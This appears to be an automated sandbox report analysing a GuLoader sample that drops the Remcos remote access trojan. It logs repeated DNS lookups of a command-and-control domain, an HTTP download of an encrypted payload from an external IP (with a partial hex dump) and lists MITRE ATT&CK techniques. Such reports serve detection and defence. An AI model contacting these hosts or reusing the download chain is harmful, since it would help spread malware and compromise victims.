Aug 3, 2021 19:04:49.880382061 CEST	8.8.8.8	192.168.2.3	0x5442	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:52.111000061 CEST	8.8.8.8	192.168.2.3	0x907d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:54.321608067 CEST	8.8.8.8	192.168.2.3	0x3c36	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:56.613110065 CEST	8.8.8.8	192.168.2.3	0x68b3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:58.823889971 CEST	8.8.8.8	192.168.2.3	0x9bf3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:01.053582907 CEST	8.8.8.8	192.168.2.3	0x9486	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:03.279337883 CEST	8.8.8.8	192.168.2.3	0xed32	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:05.506740093 CEST	8.8.8.8	192.168.2.3	0x26d6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:07.727588892 CEST	8.8.8.8	192.168.2.3	0xef65	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:10.224415064 CEST	8.8.8.8	192.168.2.3	0x173b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:12.749973059 CEST	8.8.8.8	192.168.2.3	0x71dc	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:14.958893061 CEST	8.8.8.8	192.168.2.3	0xcd49	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:17.145004988 CEST	8.8.8.8	192.168.2.3	0x954d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:19.365232944 CEST	8.8.8.8	192.168.2.3	0x4205	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:21.552804947 CEST	8.8.8.8	192.168.2.3	0x8926	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:23.757006884 CEST	8.8.8.8	192.168.2.3	0x821	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:25.959387064 CEST	8.8.8.8	192.168.2.3	0x96ce	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:28.191822052 CEST	8.8.8.8	192.168.2.3	0x4e8	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:30.381278038 CEST	8.8.8.8	192.168.2.3	0xa5e8	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:32.573491096 CEST	8.8.8.8	192.168.2.3	0x555d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:34.744133949 CEST	8.8.8.8	192.168.2.3	0x5059	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:36.961061954 CEST	8.8.8.8	192.168.2.3	0x7b1b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:39.165993929 CEST	8.8.8.8	192.168.2.3	0x428e	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:41.342091084 CEST	8.8.8.8	192.168.2.3	0x8b71	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:43.572525024 CEST	8.8.8.8	192.168.2.3	0x8af6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:45.787534952 CEST	8.8.8.8	192.168.2.3	0x86b1	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:47.976157904 CEST	8.8.8.8	192.168.2.3	0x2a2a	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:50.160826921 CEST	8.8.8.8	192.168.2.3	0x278f	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:52.357184887 CEST	8.8.8.8	192.168.2.3	0x62f6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:54.568398952 CEST	8.8.8.8	192.168.2.3	0x9faf	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:56.756485939 CEST	8.8.8.8	192.168.2.3	0x7fcc	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:58.990415096 CEST	8.8.8.8	192.168.2.3	0x4bf7	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:01.181267023 CEST	8.8.8.8	192.168.2.3	0xab5e	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:03.364897013 CEST	8.8.8.8	192.168.2.3	0xc0e9	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:05.585144997 CEST	8.8.8.8	192.168.2.3	0xc40d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:07.775700092 CEST	8.8.8.8	192.168.2.3	0x3c4c	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:09.969455957 CEST	8.8.8.8	192.168.2.3	0xba84	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:12.181878090 CEST	8.8.8.8	192.168.2.3	0x71aa	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:15.233902931 CEST	8.8.8.8	192.168.2.3	0x1519	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:17.436507940 CEST	8.8.8.8	192.168.2.3	0x4316	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:19.619803905 CEST	8.8.8.8	192.168.2.3	0xd753	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:21.808489084 CEST	8.8.8.8	192.168.2.3	0x1990	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:23.992546082 CEST	8.8.8.8	192.168.2.3	0x3ede	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:26.202452898 CEST	8.8.8.8	192.168.2.3	0xe3a2	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:28.401519060 CEST	8.8.8.8	192.168.2.3	0x667	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:30.626837969 CEST	8.8.8.8	192.168.2.3	0xcc52	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:32.831609011 CEST	8.8.8.8	192.168.2.3	0xd900	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:35.025839090 CEST	8.8.8.8	192.168.2.3	0xe662	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:37.231322050 CEST	8.8.8.8	192.168.2.3	0x75a	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:39.421473026 CEST	8.8.8.8	192.168.2.3	0xbb11	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:41.665680885 CEST	8.8.8.8	192.168.2.3	0x1152	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:43.874284983 CEST	8.8.8.8	192.168.2.3	0x997c	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:46.092864037 CEST	8.8.8.8	192.168.2.3	0x8a48	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:48.294316053 CEST	8.8.8.8	192.168.2.3	0xc1c6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:50.514136076 CEST	8.8.8.8	192.168.2.3	0x75e3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:52.690589905 CEST	8.8.8.8	192.168.2.3	0xf2df	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:54.903347015 CEST	8.8.8.8	192.168.2.3	0x7414	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:57.096909046 CEST	8.8.8.8	192.168.2.3	0x5c6f	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:59.308945894 CEST	8.8.8.8	192.168.2.3	0x25b1	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:01.572048903 CEST	8.8.8.8	192.168.2.3	0xa7a9	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:03.779144049 CEST	8.8.8.8	192.168.2.3	0x7bc4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:05.974879980 CEST	8.8.8.8	192.168.2.3	0xbda9	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:08.178571939 CEST	8.8.8.8	192.168.2.3	0x106b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:10.413378954 CEST	8.8.8.8	192.168.2.3	0x458d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:12.616333008 CEST	8.8.8.8	192.168.2.3	0x33bc	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:14.823110104 CEST	8.8.8.8	192.168.2.3	0x57de	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:17.267951012 CEST	8.8.8.8	192.168.2.3	0x2f60	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:19.534274101 CEST	8.8.8.8	192.168.2.3	0x4f1a	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:21.735933065 CEST	8.8.8.8	192.168.2.3	0xba29	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:23.916037083 CEST	8.8.8.8	192.168.2.3	0x412d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:26.126003981 CEST	8.8.8.8	192.168.2.3	0xee6f	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:28.345453024 CEST	8.8.8.8	192.168.2.3	0x2238	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:30.567393064 CEST	8.8.8.8	192.168.2.3	0x26fd	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:32.802838087 CEST	8.8.8.8	192.168.2.3	0x7e26	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:35.040189981 CEST	8.8.8.8	192.168.2.3	0xeb55	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:37.239572048 CEST	8.8.8.8	192.168.2.3	0xa36	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:39.415898085 CEST	8.8.8.8	192.168.2.3	0x1bcf	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:41.625711918 CEST	8.8.8.8	192.168.2.3	0x30fb	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:43.823787928 CEST	8.8.8.8	192.168.2.3	0xd400	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:46.009243011 CEST	8.8.8.8	192.168.2.3	0xf1d3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:48.245440960 CEST	8.8.8.8	192.168.2.3	0xeebb	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:50.439282894 CEST	8.8.8.8	192.168.2.3	0x55eb	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:52.736202002 CEST	8.8.8.8	192.168.2.3	0x9b87	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:54.935384989 CEST	8.8.8.8	192.168.2.3	0x8cea	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:57.142123938 CEST	8.8.8.8	192.168.2.3	0xbf11	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:59.324852943 CEST	8.8.8.8	192.168.2.3	0x1642	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:08:01.529334068 CEST	8.8.8.8	192.168.2.3	0x6602	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:08:03.731192112 CEST	8.8.8.8	192.168.2.3	0x2043	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

101.99.94.119

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49736	101.99.94.119	80	C:\Users\user\Desktop\pRcHGlVekw.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 19:01:31.451909065 CEST	6019	OUT	GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 101.99.94.119 Cache-Control: no-cache
Aug 3, 2021 19:01:31.500464916 CEST	6020	IN	HTTP/1.1 200 OK Date: Tue, 03 Aug 2021 17:01:31 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 Last-Modified: Mon, 02 Aug 2021 21:02:57 GMT ETag: "72840-5c899e4c3da73" Accept-Ranges: bytes Content-Length: 469056 Content-Type: application/octet-stream Data Raw: 31 79 a2 69 b5 67 ac a3 66 68 89 94 04 1b b4 8f c9 36 a1 00 58 5a db 92 66 6d cc 77 0a bf 4e 76 be cb df 4e 9d df 64 5e 44 ed 21 f3 cf f9 7d 62 b4 1b 44 fc 1e d1 54 51 7a 33 c1 4c df e6 15 ab fc 9f 41 d1 41 8f 51 31 14 c8 d8 11 ba 23 86 c1 35 93 9d fc 44 9e 32 ca a0 fd 73 d9 cb f8 37 88 87 1a 45 0a f7 90 fa bf 49 a3 1e a6 e2 63 d3 da f7 1b 8c 3f 3b 56 fb 73 f5 5f 71 11 21 67 d6 a5 5b 6f 63 6f 44 5d 92 7d a4 66 fa 44 00 3d 71 d6 5c 03 88 d7 97 a0 3d f6 3d 55 3c 74 0e f3 18 b3 74 b0 8f 9b fc 7f 70 16 c6 64 54 6e 65 de 18 f0 d3 5c bc 13 45 22 ac 24 20 7e 82 b9 70 76 a4 7d 01 f7 d5 61 be 6f 06 f4 2c 87 a6 b3 20 b2 ad 40 2e d1 2f 53 60 03 72 48 d8 a8 33 13 0a f2 ff d2 dd 78 63 a0 8b 27 17 28 0e 60 82 f6 72 ae 94 e0 7b d9 7f 8e c3 dd 64 b8 7a 3f 9c de 07 ce e8 0f a5 e2 f6 89 60 01 25 fd 8a 32 fc 79 07 a7 ab df eb 97 4a 2c 9a 34 91 22 ae 83 f5 10 09 71 2b 83 86 cf 6e c1 fd 78 9b ff 23 b1 96 1b 1e b1 63 5b 3d 90 ef 89 7e 8a 22 4d e5 54 77 c8 44 5a ca a4 4c 7d b5 c0 fc c0 dd 2e 18 32 28 dd ca 3a 96 9c 05 f0 1c 01 92 09 ad 55 8b 34 03 76 7c 2a c7 57 01 af c3 92 f4 fe a1 46 ae cb 12 c4 67 bb f2 9c 4b c8 90 cb 0b 36 3d a2 cf d6 65 cd 91 6d 1a 7b b3 ae 5d b5 71 0a 24 46 d2 95 ab 70 f8 9c 0c 0f 55 c2 c0 0c ed 95 d2 b5 e3 48 48 bc f0 3e 3a 82 e8 91 28 22 11 91 fd 50 31 d0 48 57 96 73 6f 6f ab 25 0c 11 ac 70 08 53 83 83 3f b8 3e c5 49 ba 0a e0 6c cd 20 3a db 77 67 8e fb 36 1e cb 1f 01 03 9a 71 8e 49 ed 61 2c 69 21 ad ce f9 ee ff ec 84 8e 6d 86 db b8 3f b7 03 e2 7f 24 ba 8c 67 c8 40 b0 eb df 8a b4 91 9b 4f 28 1a 3b 00 71 28 06 b7 a3 84 fa b2 23 5c 4c 76 b9 6d c0 ea b6 ba 5f 07 9a 82 96 5b b9 53 9d 33 fd 1b e9 51 5d 11 32 aa ab 37 a4 e9 e4 ed 8f 5f a9 dd 16 e8 f1 02 6d 5d 93 67 0b b1 97 41 ba 80 65 d4 cc ba 7e b1 6e be 4b 0a b7 2c 68 50 ad 15 84 32 c1 47 3e 78 a2 f0 ac 5e f6 53 15 d2 d0 93 e0 68 65 1c ab 21 69 d6 3b e3 69 9c 2b 10 57 7b 25 d8 99 a9 23 1e 80 6a 8b d0 4c c9 98 5f 04 ad 20 6e 20 e0 d4 86 3d d5 78 c0 63 00 93 0d 76 4f fd ab d5 50 53 0c fd ae b8 f8 84 03 9c dc 98 09 3d 1f 8f 80 de 9c d3 a6 97 0b fa 1a 66 11 63 4d 31 1f 06 d7 7e 4c ea b2 0d 17 00 0e 9f e1 20 97 00 06 32 b2 d4 a3 8a ef 7a 40 7f dd 0c 11 b7 be c1 20 e1 bb 88 08 d8 e9 42 02 00 36 78 93 28 da 41 52 f9 96 9e c3 54 a2 68 b6 e1 93 f8 b8 d3 15 6d 42 73 42 64 ce 30 64 40 c6 a3 ef ed a2 d8 77 ce b3 d0 4e 87 51 cd 57 42 a7 9e 1f fa 7c 71 00 a0 0e f5 10 6a ff 84 ee f7 d2 d0 7f 20 ec 19 ab 75 73 9c 02 41 31 3d 88 d3 19 ed 16 29 30 07 c6 5c c1 5b bd a4 4b 02 bc c6 24 24 f2 cb 2e 0a a2 1f a2 53 16 ba b6 66 85 70 87 87 55 7d 12 44 66 c1 b9 46 4e 1e a0 dc 7a e0 ca 8e 6e f8 1e 4b 3f 65 f2 b4 35 8e 12 2c b3 7e 16 04 83 d2 5c fc e9 9c 64 d2 98 66 e9 42 4b 0b ac c1 11 2d 8f b1 c5 d1 d1 42 8f 51 31 10 c8 d8 11 45 dc 86 c1 8d 93 9d fc 44 9e 32 ca e0 fd 73 d9 cb f8 37 88 87 1a 45 0a f7 90 fa bf 49 a3 1e a6 e2 63 d3 da f7 1b 8c 3f 3b 56 fb 73 f5 5f 71 11 31 66 d6 a5 55 70 d9 61 44 e9 9b b0 85 de fb 08 cd 1c 25 be 35 70 a8 a7 e5 cf 5a 84 5c 38 1c 17 6f 9d 76 dc 00 90 ed fe dc 0d 05 78 e6 0d 3a 4e 21 91 4b d0 be 33 d8 76 6b 2f a1 2e 04 7e 82 b9 70 76 a4 7d ab 74 97 51 50 8d 2a 97 c2 65 8a Data Ascii: 1yigfh6XZfmwNvNd^D!}bDTQz3LAAQ1#5D2s7EIc?;Vs_q!g[ocoD]}fD=q\==U<ttpdTne\E"$ ~pv}ao, @./S`rH3xc'(`r{dz?`%2yJ,4"q+nx#c[=~"MTwDZL}.2(:U4v\|WFgK6=em{]q$FpUHH>:("P1HWsoo%pS?>Il :wg6qIa,i!m?$g@O(;q(#\Lvm_[S3Q]27_m]gAe~nK,hP2G>x^She!i;i+W{%#jL_ n =xcvOPS=fcM1~L 2z@ B6x(ARThmBsBd0d@wNQWB\|qj usA1=)0\[K$$.SfpU}DfFNznK?e5,~\dfBK-BQ1ED2s7EIc?;Vs_q1fUpaD%5pZ\8ovx:N!K3vk/.~pv}tQPe

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: pRcHGlVekw.exe PID: 3164 Parent PID: 5640

General

Start time:	18:59:30
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\pRcHGlVekw.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\pRcHGlVekw.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	D2CB32F7C7F384B4BAA8DD13D6B5BBAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: pRcHGlVekw.exe PID: 1724 Parent PID: 3164

General

Start time:	19:00:28
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\pRcHGlVekw.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\pRcHGlVekw.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	D2CB32F7C7F384B4BAA8DD13D6B5BBAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
